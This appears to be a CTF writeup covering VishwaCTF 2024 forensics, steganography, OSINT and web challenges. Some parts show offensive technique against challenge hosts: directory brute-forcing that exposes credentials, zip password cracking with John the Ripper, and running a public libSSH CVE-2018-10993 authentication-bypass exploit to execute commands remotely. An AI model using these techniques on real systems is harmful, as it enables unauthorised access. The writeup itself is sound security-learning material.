VishwaCTF 2024 - Writeups
This is a writeup for forensics, OSINT, steganography, misc and web challenges from VishwaCTF 2024. The CTF was quite enjoyable despite having bad/guessy challenges at the beginning. Fortunately, the second wave of challenges had better quality in them. Hope they improve their challenges next year.
Smoke out the Rat [Forensics]
Question: There was a major heist at the local bank. Initial findings suggest that an intruder from within the bank, specifically someone from the bank’s database maintenance team, aided in the robbery. This traitor granted access to an outsider, who orchestrated the generation of fake transactions and the depletion of our valuable customers’ accounts. We have the phone number, ‘789-012-3456’, from which the login was detected, which manipulated the bank’s employee data. Additionally, it’s noteworthy that this intruder attempted to add gibberish to the binlog and ultimately dropped the entire database at the end of the heist. Your task is to identify the first name of the traitor, the last name of the outsider, and the time at which the outsider was added to the database. Flag format: VishwaCTF{TraitorFirstName_OutsiderLastName_HH:MM:SS}
Flag: VishwaCTF{Matthew_Darwin_18:01:29}
We are given a MySQL binary log file. Unfortunately, I could not finish this challenge before the CTF ended, so I attempted it again with help from @rex on Discord. Using a mySQL plugin mysqlbinlog
, the log file can be parsed into readable text. After parsing, we can use MySQL to view the traitor’s name which is Mathew Miller
.
1
PS C:\Users\ooiro\Documents\sharedfolder\vishwa> mysqlbinlog -vv DBlog-bin.000007 > vishwa.sql
Now I have to find the name of the outsider. One clue was that the traitor dropped the table after the heist. So I searched for any DROP queries. I found two databases being dropped: test
and bank
.
Then I went to search to find UPDATE queries for employees
table in the bank
database. As can be seen from the image, an update was made where the user John Smith
has been replaced with John Darwin
. So Darwin is the last name of outsider. We can also see the time at which this update was made.
Repo Riddles [Forensics]
Question: We got a suspicious Linkedin post which got a description and also a zip file with it. It is suspected that a message is hidden in there. Can you find it?
LinkedIn Post Description:
1
2
3
4
5
6
7
Title: My First Project -The Journey Begins
Hello fellow developers and curious minds!
I'm thrilled to share with you my very first Git project - a labor of love, dedication, and countless late-night commits. 🚀
Explore the code, unearth its nuances, and let me know your thoughts. Your feedback is invaluable and will contribute to the ongoing evolution of this project.
Flag: VishwaCTF{G1tG1gger_2727}
We are given a zip file that contains a GitHub repository. Unfortunately, I could not finish this challenge before the CTF ended, so I attempted it again with help from @rex on Discord. Inside the hidden .git folder, there are several blobs that could lead us to the flag. Using GitTools, I can extract commits and their content from a broken repository.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
└─$ sudo bash extractor.sh /vishwa/LearningGit/ /vishwa/Forensics
[sudo] password for kali:
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[+] Found commit: 02adccb9209edc074b17967f062cc60413f64293
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/0-02adccb9209edc074b17967f062cc60413f64293/index.html
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/0-02adccb9209edc074b17967f062cc60413f64293/style.css
[+] Found commit: 41dca9f040deaa65060065ef78523ba44b2c60f1
[+] Found commit: 57f66532b0c6403f95dcfaffa0650f28850d6922
[+] Found commit: 9370bf54bc070fa53c5f2b8b14834db8ed7f3e79
[+] Found commit: aa3306a61a6dc2b4b1fe97ede91c5c843d452c58
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/4-aa3306a61a6dc2b4b1fe97ede91c5c843d452c58/f1.txt
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/4-aa3306a61a6dc2b4b1fe97ede91c5c843d452c58/f2.txt
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/4-aa3306a61a6dc2b4b1fe97ede91c5c843d452c58/f3.txt
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/4-aa3306a61a6dc2b4b1fe97ede91c5c843d452c58/f4.txt
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/4-aa3306a61a6dc2b4b1fe97ede91c5c843d452c58/f5.txt
[+] Found commit: db01ffe29d0ea57655fcd880dea8816cb2d74d9f
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/5-db01ffe29d0ea57655fcd880dea8816cb2d74d9f/f1.txt
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/5-db01ffe29d0ea57655fcd880dea8816cb2d74d9f/f2.txt
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/5-db01ffe29d0ea57655fcd880dea8816cb2d74d9f/f3.txt
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/5-db01ffe29d0ea57655fcd880dea8816cb2d74d9f/f4.txt
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/5-db01ffe29d0ea57655fcd880dea8816cb2d74d9f/f5.txt
[+] Found commit: ebf967130d550a180f7e3fda47a5ca96bb442c81
[+] Found file: /mnt/hgfs/sharedfolder/vishwa/Forensics/6-ebf967130d550a180f7e3fda47a5ca96bb442c81/Screenshot 2024-03-01 151511.png
Reading each text file manually, the flag is broken up into index strings. So I went ahead to grep the word “string” and got parts of the flag. However, index 6, 7 and 8 was missing from the results obtained.
1
2
3
4
5
6
7
8
9
10
└─$ grep -rni "string" .
./0-02adccb9209edc074b17967f062cc60413f64293/index.html:116: string[3: 6] = G1g
./2-57f66532b0c6403f95dcfaffa0650f28850d6922/commit-meta.txt:6:string[0] = G string[1] = 1 string[2] = t
./4-aa3306a61a6dc2b4b1fe97ede91c5c843d452c58/f4.txt:6:string -- VishwaCTF{}
./4-aa3306a61a6dc2b4b1fe97ede91c5c843d452c58/f4.txt:8:HERE -- 0th Index of string is V.
./5-db01ffe29d0ea57655fcd880dea8816cb2d74d9f/f4.txt:5:string[9] = _
./5-db01ffe29d0ea57655fcd880dea8816cb2d74d9f/f4.txt:6:string[10] = 2
./5-db01ffe29d0ea57655fcd880dea8816cb2d74d9f/f4.txt:7:string[11] = 7
./5-db01ffe29d0ea57655fcd880dea8816cb2d74d9f/f4.txt:8:string[12] = 2
./5-db01ffe29d0ea57655fcd880dea8816cb2d74d9f/f4.txt:9:string[13] = 7
After going through the folders again, a png file can be found which contains the letters for index 6, 7 and 8.
Router |port| [Forensics]
Question: There’s some unusual traffic on the daytime port, but it isn’t related to date or time requests. Analyze the packet capture to retrieve the flag.
Flag: VishwaCTF{K3Y5_CAN_0P3N_10CK5}
We are given a pcap file that has several packets with different protocols. The description mentioned something about daytime port, so I checked online on what port is it to filter my search. Doing some Googling, the port for daytime protocol is Port 13 (tcp/udp)
. Looking at the packets, there seems to be encoded text that holds valuable information. This is pretty guessy but I tried Vigenère decode with this site and it shows that it was decoded using keyword nnn
.
The decoded text:
1
2
3
4
5
6
7
8
9
10
11
Hey, mate!
Yo, long time no see! You sure this mode of communication is still safe?
Yeah, unless someone else is capturing network packets on the same network we're using. Anyhow, our text is encrypted, and it would be difficult to interpret. So let's hope no one else is capturing. What's so confidential that you're about to share? It's about cracking the password of a person with the username 'Anonymous.'
Oh wait! Don't you know I'm not so good at password cracking?
Yeah, I know, but it's not about cracking. It's about the analysis of packets. I've completed most of the job, even figured out a way to get the session key to decrypt and decompress the packets. Holy cow! How in the world did you manage to get this key from his device? Firstly, I hacked the router of our institute and closely monitored the traffic, waiting for 'Anonymous' to download some software that requires admin privilege to install. Once he started the download, I, with complete control of the router, replaced the incoming packets with the ones I created containing malicious scripts, and thus gained a backdoor access to his device. The further job was a piece of cake.
Whoa! It's so surprising to see how much you know about networking or hacking, to be specific.
Yeah, I did a lot of research on that. Now, should we focus on the purpose of this meet? Yes, of course. So, what should I do for you?
Have you started the packet capture as I told you earlier?
Yes, I did. Great! I will be sending his SSL key, so find the password of 'Anonymous.' Yes, I would, but I need some details like where to start. The only details I have are he uses the same password for every website, and he just went on to register for a CTF event.
Okay, I will search for it. Wait a second, I won't be sending the SSL key on this Daytime Protocol port; we need to keep this untraceable. I will be sending it through FTP. Since the file is too large, I will be sending it in two parts. Please remember to merge them before using it. Additionally, some changes may be made to it during transfer due to the method I'm using. Ensure that you handle these issues.
Okay! ...
Reading the decoded text, it seems that the flag is the password of the user Anonymous
and the hacker managed to steal a SSL key to encrypt packets. It also mentions that the SSL key is sent to another hacker via FTP. So I filtered the pcap to find ftp-data and found 2 packets, so the key is probably broken up into 2 parts.
Again, I randomly guessed Vigenère with the same site and succesfully extracted both PSK log files and placed them into Wireshark. This can be done by navigating to Preferences > Protocols > TLS > (Pre)-Master-Secret log files
and add in the key file.
After decoding it, several HTTP2 and HTTP3 packets can be found. Filtering down for passwords, I managed to find it which is basically the flag.
We Are Valorant [Steganography]
Question: One day, while playing Valorant, I received a mail from Riot Games that read, “In a world full of light, sometimes the shadows help you win.” “Your Signature move also helps you a lot ; develop one and ace it now.” It also had an image and a video/gif attached to it. I am not able to understand what they want to say. Help me find what the message wants to express.
Flag: VishwaCTF{you_are_invited_to_the_biggest_valorant_event}
We are given a corrupted jpg file and a mp4 video of Astra (which seems to be a gif). Fixing the jpg file, it shows the agents in Valorant but there were no important information in it. Thinking this was a steganography challenge, I went ahead to analyze the jpg file via Aperi’Solve and found out the common passwords used by other people. One of them was Tenz
which I had no clue how they gotten it but it was the password to extract a text file which contains the flag.
1
2
3
4
5
Hello!!
hope you are enjoying the CTF
here's your flag
VishwaCTF{you_are_invited_to_the_biggest_valorant_event}
Mysterious Old Case [Steganography]
Question: You as a FBI Agent, are working on a old case involving a ransom of $200,000. After some digging you recovered an audio recording.
Flag: VishwaCTF{1_W!LL_3E_B@CK}
We are given a mp3 file that seems to be just music. However, after I analyzed it on Audacity, it seems that there were hidden messages in them.
Listening on the part, it seems that the voice message is reversed, so I reversed the whole mp3 file and used this site to get the transcript of the reversed mp3 file.
The transcript:
1
2
3
4
5
6
7
8
Cooper.
It is 24 November 1971.
Now I have left from Seattle and headed towards Reno.
I have got all my demands fulfilled.
I have done some changes in the flight log and uploaded it to the remote server.
The file is encrypted.
The hint for description is the airline I was flying in.
Most importantly, the secret key is split and hidden in every element of the Fibonacci series, starting from two.
Here, I was stuck since I have no clue where the encrypted file was. However, I suddenly found a suspicious Google Drive link in the metadata of the mp3 file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
└─$ exiftool final.mp3
ExifTool Version Number : 12.76
File Name : final.mp3
Directory : .
File Size : 2.6 MB
File Modification Date/Time : 2024:03:02 23:19:36-05:00
File Access Date/Time : 2024:03:03 04:14:51-05:00
File Inode Change Date/Time : 2024:03:02 23:19:36-05:00
File Permissions : -rwxrwxrwx
File Type : MP3
File Type Extension : mp3
MIME Type : audio/mpeg
MPEG Audio Version : 1
Audio Layer : 3
Audio Bitrate : 128 kbps
Sample Rate : 44100
Channel Mode : Stereo
MS Stereo : Off
Intensity Stereo : Off
Copyright Flag : False
Original Media : False
Emphasis : None
ID3 Size : 320209
Title : Unknown
Artist : Anonymous
Track : 727/305
Album : Cooper
Recording Time : 1971
Genre : the zip file is 100 MB not 7 GB
Original Release Time : 0001
Band : DB Cooper
Comment : password for the zip is all lowecase with no spaces
User Defined URL : https://drive.google.com/file/d/1bkuZRLKOGWB7tLNBseWL34BoyI379QbF/view?usp=drive_lin
User Defined Text : (purl) https://drive.google.com/file/d/1bkuZRLKOGWB7tLNBseWL34BoyI379QbF/view?usp=drive_lin
Picture MIME Type : image/jpeg
Picture Type : Front Cover
Picture Description : Front Cover
Picture : (Binary data 158421 bytes, use -b option to extract)
Date/Time Original : 1971
Duration : 0:02:22 (approx)
The URL link gives us a zip file of the flight logs. As the question mentioned, the password is the airline Cooper was flying in. Thankfully, I am a huge fan of the story of DB Cooper so I knew the airline name was Northwest Orient Airlines
. However, the comment metadata mentioned the password being all lowercased with no spaces, so the password is northwestorientairlines
.
Extracting the files in the zip, many flight logs can be obtained. Since I knew his story already, the flight he was in was Flight #305
. Reading the log files, it seems that the flag was broken up into pieces with bogus text between them. The question mentioned about Fibonacci sequence which seems to be the case where parts of the flag was following the sequence starting from 2. (2, 3, 5, 8, 13, 21, 34, 55, 89,144,233,377,610,987, 1597, 2584, 4181, etc)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
1971-11-24 06:22:08.531691 - ATT - Boeing 727
V
i
1971-11-24 07:31:08.531691 - HWR - Boeing 727
s
1971-11-24 06:22:08.531691 - ATT - Boeing 727
1971-11-24 07:31:08.531691 - HWR - Boeing 727
h
1971-11-24 06:22:08.531691 - ATT - Boeing 727
1971-11-24 06:22:08.531691 - ATT - Boeing 727
1971-11-24 06:22:08.531691 - ATT - Boeing 727
1971-11-24 07:31:08.531691 - HWR - Boeing 727
w
1971-11-24 07:31:08.531691 - HWR - Boeing 727
1971-11-24 06:22:08.531691 - ATT - Boeing 727
1971-11-24 06:22:08.531691 - ATT - Boeing 727
1971-11-24 07:31:08.531691 - HWR - Boeing 727
1971-11-24 07:31:08.531691 - HWR - Boeing 727
1971-11-24 07:31:08.531691 - HWR - Boeing 727
1971-11-24 06:22:08.531691 - ATT - Boeing 727
a
...
However, one good thing the authors missed out on was the bogus text were repeated, so I just created a script to remove them and the flag can be obtained.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def remove_entries(log_filename, entries_to_remove):
with open(log_filename, 'r') as file:
lines = file.readlines()
with open(log_filename, 'w') as file:
for line in lines:
if not any(entry in line for entry in entries_to_remove):
file.write(line)
log_filename = "./flight_logs/Flight-305.log"
entries_to_remove = [
"1971-11-24 06:22:08.531691 - ATT - Boeing 727",
"1971-11-24 07:31:08.531691 - HWR - Boeing 727"
]
remove_entries(log_filename, entries_to_remove)
print("Entries removed successfully.")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
V
i
s
h
w
a
C
T
F
{
1
_
W
!
L
L
_
3
E
_
B
@
C
K
}
Secret Code [Steganography]
Question: Akshay has a letter for you and need your help.
Flag: VishwaCTF{th15_15_4_5up3r_53cr3t_c0d3_u53_1t_w153ly_4nd_d0nt_5h4re_1t_w1th_4ny0ne}
The question gave us a jpg file and a text file containing a message from someone.
1
2
3
4
5
6
7
8
9
10
11
To,
VishwaCTF'24 Participant
I am Akshay, an ex employee at a Tech firm. Over all the years, I have been trading Cypto currencies and made a lot of money doing that. Now I want to withdraw my money, but I'll be charged a huge tax for the transaction in my country.
I got to know that you are a nice person and also your country doesn't charge any tax so I need your help.
I want you to withdraw the money and hand over to me. But I feel some hackers are spying on my internet activity, so I am sharing this file with you. Get the password and withdraw it before the hackers have the access to my account.
Your friend,
Akshay
The first thing I did was binwalk the jpg file to extract hidden data embedded within it.
1
2
3
4
5
6
7
8
└─$ binwalk -e confidential.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
116247 0x1C617 Zip archive data, at least v2.0 to extract, compressed size: 72486, uncompressed size: 72530, name: 5ecr3t_c0de.zip
188778 0x2E16A Zip archive data, at least v2.0 to extract, compressed size: 170, uncompressed size: 263, name: helper.txt
189177 0x2E2F9 End of Zip archive, footer length: 22
The zip file contains a password-protected zip file and a text file containing a hint.
1
2
3
Hey buddy, I'm really sorry if this takes long for you to get the password. But it's a matter of $10,000,000 so I can't risk it out.
"I really can't remember the password for zip. All I can remember is it was a 6 digit number. Hope you can figure it out easily"
So it was obvious I had to crack the zip password. I used fcrackzip
but it could not crack it, so I used John the Ripper
instead. I also created a script to generated a wordlist of 6 digit numbers for a quicker crack.
1
2
3
4
5
6
7
8
$ zip2john 5ecr3t_c0de.zip > secret.hash
$ john --wordlist=sixdigits.txt secret.hash
$ john --show secret.hash
5ecr3t_c0de.zip/5ecr3t_c0de.txt:945621:5ecr3t_c0de.txt:5ecr3t_c0de.zip:5ecr3t_c0de.zip
5ecr3t_c0de.zip/info.txt:945621:info.txt:5ecr3t_c0de.zip:5ecr3t_c0de.zip
2 password hashes cracked, 0 left
After unlocking the zip file, two text files can be obtained. One of them was random numbers while the other had another hint.
1
What are these random numbers? Is it related to the given image? Maybe you should find it out by yourself
Analyzing the random numbers, they seem to either be (x,y) coordinates or (x,y) pixels.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
(443, 1096)
(444, 1096)
(445, 1096)
(3220, 1096)
(3221, 1096)
(38, 1097)
(39, 1097)
(43, 1097)
(80, 1097)
(81, 1097)
(83, 1097)
(93, 1097)
(95, 1097)
...
Since the hint mentioned something about the given image (confidential.jpg), I used ChatGPT to create a script that will color a white pixel on a blank jpg file which could uncover the flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from PIL import Image
def read_coordinates(file_path):
with open(file_path, 'r') as f:
lines = f.readlines()
coordinates = []
for line in lines:
x, y = line.replace('(', '').replace(')', '').split(',')
coordinates.append((int(x), int(y)))
return coordinates
def draw_white_pixels(image_path, coordinates, output_path):
img = Image.open(image_path)
for coord in coordinates:
img.putpixel(coord, (255, 255, 255)) # RGB value for white
img.save(output_path)
image_path = '/confidential.jpg'
file_path = '/5ecr3t_c0de.txt'
output_path = 'output_image.png'
coordinates = read_coordinates(file_path)
draw_white_pixels(image_path, coordinates, output_path)
print(f"Image with white pixels at the given coordinates has been saved as {output_path}.")
After running the script, the flag is shown in the output jpg file.
The end is beginning [OSINT]
Question: Me and my friends just finished our final semester of B.Tech, so we decided to have a trip somewhere, but due to some reason, many of them were not available for the trip, but we were all ok as less is more. As the trip was about to end, one of my friends said we should try scuba diving here. I was scared of that, but my friends said, If you don’t risk anything, you risk everything. Seriously, why do we have to risk our lives for half an hour? It’s impossible for me, I said. But they motivated me all night, and then it was time for the dive. I screamed, Impossible is not a word in my vocabulary, and dived in. After all this, when I came back to my room, I realised I was low on money, so I called and asked my father for some help by singing something like this:
1
2
3
I’d be gone to my dad
And ask for some cash
I ran ......
All the Hustle towards the trip was worth it, as we enjoyed it a lot and made some awesome memories throughout the trip. Flag format: VishwaCTF{My Name according to story_Amount I got in figures}
Flag: VishwaCTF{Paradox_5000}
Search the lyrics and it leads to this song with the singer’s name.
Near the starting part of the lyrics, it seems that the rapper is saying something about his father giving money.
TRY HACK ME [OSINT]
Question: TryHackMe is a browser-based cyber security training platform, with learning content covering all skill levels from the complete beginner to the seasoned hacker. One of our team member is very active on the platform. Recently, I got to know that he comes under 3% in the global leaderboard. Impressive isn’t it. Maybe you should have a look at his profile PS : He keeps his digital identity very simple. No fancy usernames. It’s just a simple mathematics His real name == His username
Flag: VishwaCTF{Pr0f1l3_1dent1fi3d_v0uch3r5_cr3d1t3d_5ucc355fully}
The question mentions that one of the staff of VishwaCTF is top 3% globally on TryHackMe. So I went ahead and analyzed the staff and authors of VishwaCTF on their main website.
Looking at their members on the CTF website, it seems that Ankush Kaudi
is the right person. Using his username on TryHackMe via URL, the profile can be found with the flag.
ifconfig_inet [OSINT]
Question: In the labyrinth of binary shadows, Elliot finds himself standing at the crossroads of justice and chaos. Mr. Robot, the enigmatic leader of the clandestine hacktivist group, has just unleashed a digital storm upon Evil Corp’s fortress. The chaos is palpable, but this is just the beginning. As the digital tempest rages, Elliot receives a cryptic message from Mr. Robot. “To bring down Evil Corp, we must cast the shadows of guilt upon Terry Colby,” the message echoes in the encrypted channels. However, in the haze of hacktivism, Elliot loses the crucial IP address and the elusive name of the DAT file, leaving him in a digital conundrum. To navigate this cybernetic maze, Elliot must embark on a quest through the binary underbelly of Evil Corp’s servers. The servers, guarded by firewalls and encrypted gatekeepers, conceal the secrets needed to ensure Terry Colby’s fall. Guide Elliot to the his destiny. Flag Format : VishwaCTF{name of DAT file with extension_IP address of Terry Colby}
Flag: VishwaCTF{fsociety00.dat_218.108.149.373}
Reading the question, it is very obvious that I have to perform OSINT on the movie Mr. Robot
to find the IP and the file name.
Sagar Sangram [OSINT]
Question: Once upon a time there were 2 groups, one was known for being on positive side and other on negative side. Both the groups wanted to be immortal and hence required a divine potion for it. So they decided to “Churn the Ocean” to get the divine potion. It’s a wonderful event written in some of the ancient scriptures. Hop on to the server and have a chat with bot, maybe he’ll give you the flag.
Flag: VishwaCTF{karmany-evadhikaras te ma phaleshu kadachana ma karma-phala-hetur bhur ma te sango stvakarmani}
We are given a Discord server link where the bot is located in. Answer a few questions from the bot and the flag will be given (use ChatGPT).
The questions:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Q1 of 10 : So it was decided, to obtain the divine potion of immortality, churning of the ocean is to be performed. For that purpose a huge mountain was used. Tell me what is the name of the mountain and also which ocean was churned to obtain the potion of immortality?
Ans fromat : name of ocean without space_name of mountain
Q2 of 10 : Let's get step back. Mount Mandara was used in churning. But it was not just around the ocean. It was brought there by someone. So, who brought Mount Mandara to Kshirasagara?
Q3 of 10 : Now the stage is set but to churn the ocean, something was required which both the groups would hold and churn. Who was used like a rope to churn the ocean Kshirasagara?
Q4 of 10 : The process starts and the outcomes begin to appear. One such outcome was a very threatening substance, which had the power to destroy the whole universe. But 'The Ultimate Destroyer' comes to rescue and consumed it, which results in his throat turning blue hence he is also called 'Neelakantha'. What is the substance called?
Q5 of 10 : Let's talk about few more outcomes. One such divine outcome was a tree. It was taken to the abode of Indra in swarga. It is often referred to as 'Wish Fulfilling Tree' as it possess the power to bring one's imagination into reality. Tell me the name of this tree?
Q6 of 10 : Another creature appeared was a very powerful elephant which was taken by Lord Indra as his medium of transportation. It was very powerful elephant and also referred sometimes as 'King of Elephants'. What is the name of that elephant?
Q7 of 10 : After a while during the process, a bow appeared during the churning. It was given to Lord Vishnu as a weapon. What is the name of that divine bow?
Q8 of 10 : In ancient times as mentioned in the scriptures, conch was used as a sign to initiate a war between two groups (also used for other purposes as well). Different persons from both the sides would blow the conch which will mark the start of the war. During the churning, one such conch was obtained and it was given to Lord Vishnu. It's sound symbolizes the 'Sound of Creation'. What is the name of the conch?
Q9 of 10 : The fortunes turned as the goddess of fortune herself appeared. Every wanted the goddess of fortune to be at their side, but the destiny has it's own plan. She chose Lord Vishnu as her eternal consort.. Who is the goddess of fortune?
Q10 of 10 : Ok, let's end this thing. After all the struggle from both the sides, the long wait comes to an end. The divine potion is here and it is brought by none other than the physician of the devas. He is also referred to as 'God of Ayurveda'. Tell me his name and also the name of divine potion?
Ans format : name of the physician_name of divine potion
Impressive. A perfect 10/10. You are one the who deserves the flag. Just one last thing. All the event which is I asked you about is very popular and is mentioned in various scriptures like Vishnu Purana, Mahabharata, etc. Can you tell me what this event is popularly known as?
Use _ in place of any space
The answers:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Kshirasagara_Mandara
Garuda
Vasuki
halahala
Kalpavriksha
Airavata
Sharanga
Panchajanya
Lakshmi
Dhanvantari_Amrita
Samudra_Manthana
Perfect. That's all about this challenge. Hope you enjoyed it.
Thank you for playing VishwaCTF'24. Here you go with the flag for the challenge 'Sagar Sangram'
VishwaCTF{karmany-evadhikaras te ma phaleshu kadachana ma karma-phala-hetur bhur ma te sango stvakarmani}
Cyber Pursuit Manhunt [OSINT]
Question: In response to alarming reports, our cybersecurity team is actively pursuing a hacker known by the alias “h3ck3r_h3_bh41”, who poses a serious threat by extorting innocent individuals for monetary gain. Your mission is to track down this hacker and provide us with the crucial information needed to apprehend them. Retrieve the Hacker’s complete full name (first name, middle name, last name), formatted in lowercase and replacing spaces with underscores, along with the associated website domain. Flag Format: VishwaCTF{full_name_domain.in}
Flag: VishwaCTF{simon_john_peter_tadobanationalpark.in}
We are given a handle of the hacker, so I used it on Twitter/X and it gives the hacker’s account. However, his posts seem to be unrelated to the challenge, hence I looked into his followers. Thinking I was in the right track, I asked the admins if the followers are related to the challenge, but its not (rip my 2 hours). Unfortunately, I could not finish this challenge before the CTF ended, so I attempted it again with help from @rex on Discord.
The solution was actually very straightforward, looking at the user’s posts, the one that stands out the most was the first post.
1
Who is Cookie the baby chick ? Very Cute indeed :)
It seems that I should be looking for someone called Cookie (who is a baby chick??). Looking around social websites, it seems that Instagram has the user. Looking around his posts and followers, his dad’s full name can be found which is simon_j_peter
. Additionally, his first post mentions his dad’s Youtube channel.
Analyzing his Youtube, the username can be obtained but it seems that I am in another loophole. However, I remembered Cookie mentioning his dad being a workaholic
, so his dad could be on LinkedIn.
Using the username huskywoofwoof
on LinkedIn, he can be found after going through several users and it shows his middle name being John
.
Looking at his second post, another link could be obtained that leads to an image. Having no clue on what to do with the image, I analyzed its metadata using exiftool and found coordinates for Maharashtra, India
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
└─$ exiftool stock.jpg
ExifTool Version Number : 12.76
File Name : stock.jpg
Directory : .
File Size : 417 kB
File Modification Date/Time : 2024:03:03 09:08:04-05:00
File Access Date/Time : 2024:03:03 09:08:11-05:00
File Inode Change Date/Time : 2024:03:03 09:08:04-05:00
File Permissions : -rwxrwxrwx
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Big-endian (Motorola, MM)
Light Source : Unknown
Orientation : Unknown (0)
GPS Latitude Ref : North
GPS Longitude Ref : East
Image Width : 1500
Image Height : 1101
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 1500x1101
Megapixels : 1.7
GPS Latitude : 19 deg 57' 41.54" N
GPS Longitude : 79 deg 17' 46.13" E
GPS Position : 19 deg 57' 41.54" N, 79 deg 17' 46.13" E
Remembering there were Tigers in the picture, I linked the location and tigers to find out about a national park called Tadoba Andhari Tiger Reserve
. So the national park’s website must be the domain.
Trip To Us [Web]
Question: IIT kharakpur is organizing a US Industrial Visit. The cost of the registration is $1000. But as always there is an opportunity for intelligent minds. Find the hidden login and Get the flag to get yourself a free US trip ticket.
Flag: VishwaCTF{y0u_g0t_th3_7r1p_t0_u5}
We are given a website of a US Industrial Visit form.
However, pressing the Click Here
button leads us to an error page. So I analyze the source code to find out how I can bypass this page.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HomePage</title>
<style>
.container {
text-align: center;
border: 2px solid black;
margin-top: 10px;
background-color: red;
height: 100pt;
}
img{
border-radius: 10px;
}
</style>
</head>
<body>
<div class="container">
<div class="container">
<h1>YOU ARE NOT AN IITAIN , GO BACK!!!!!!!</h1>
<img src="./Images/GoBack.webp" alt="Change User agent to 'IITIAN'">
</div>
</div>
</body>
</html>
It mentions changing the user agent to IITIAN
, so I went ahead and downloaded an extension that can change user agents on Firefox. With the user agent changed, we are able to access a new page.
Reading the page source code again, there was nothing interesting that can help me obtain the flag. They did provide the username for the login so that will be used later.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<!DOCTYPE html>
<html>
<head>
<title>LOGIN</title>
<link rel="stylesheet" type="text/css" href="style.css">
<style>
img{
width: 100%;
position: absolute;
z-index: -1;
}
</style>
</head>
<body>
<img class= "bg" src="./Images/IIT.avif" alt="USE username as: admin">
<h1>Welcome to IIT Kharakpur, US trip form</h1>
<p style="font-size:20px;"><strong>Login to get your registration ID</strong></p>
<form action="user-validation.php" method="post">
<h2>LOGIN</h2>
<label>User Name</label>
<input type="text" name="uname" placeholder="User Name"><br>
<label>User Name</label>
<input type="password" name="password" placeholder="Password"><br>
<button type="submit">Login</button>
</form>
</body>
</html>
So I attempt to enumerate directories of the original website and found interesting results. It seems that there is database stored in the website.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
└─$ gobuster dir --url ch66423157504.ch.eng.run -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://ch66423157504.ch.eng.run
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/Images (Status: 301) [Size: 337] [--> http://ch66423157504.ch.eng.run/Images/]
/db (Status: 301) [Size: 333] [--> http://ch66423157504.ch.eng.run/db/]
/backups (Status: 301) [Size: 338] [--> http://ch66423157504.ch.eng.run/backups/]
...
Checking out the database path, the users.sql
database can be found which stores account credentials.
Use the credentials to login and get the flag.
Save The City [Web]
Question: The RAW Has Got An Input That ISIS Has Planted a Bomb Somewhere In The Pune! Fortunetly, RAW Has Infiltratrated The Internet Activity of One Suspect And They Found This Link. You Have To Find The Location ASAP!
Flag: VishwaCTF{elrow-club-pune}
We are given a netcat connection and using the command, we get a weird SSH version and it disconnects automatically after a few seconds. My teammate @Shen managed to find out what this meant.
1
2
3
4
└─$ nc 13.234.11.113 32657
SSH-2.0-libssh_0.8.1
Bye Bye
He mentioned that this was related to a CVE, specifically CVE-2018-10993. Using an exploit on GitHub, we can perform commands remotely via the exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
└─$ python cve-2018-10993.py 13.234.11.113 -p 32657 -c 'ls'
:: CVE-2018-10993 libSSH authentication bypass exploit.
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
v0.1
bin
boot
dev
etc
home
lib
lib64
location.txt
media
mnt
opt
proc
root
run
sbin
srv
ssh_server_fork.patch
sys
tmp
usr
var
A suspicious text file can be found, the flag was in it.
1
2
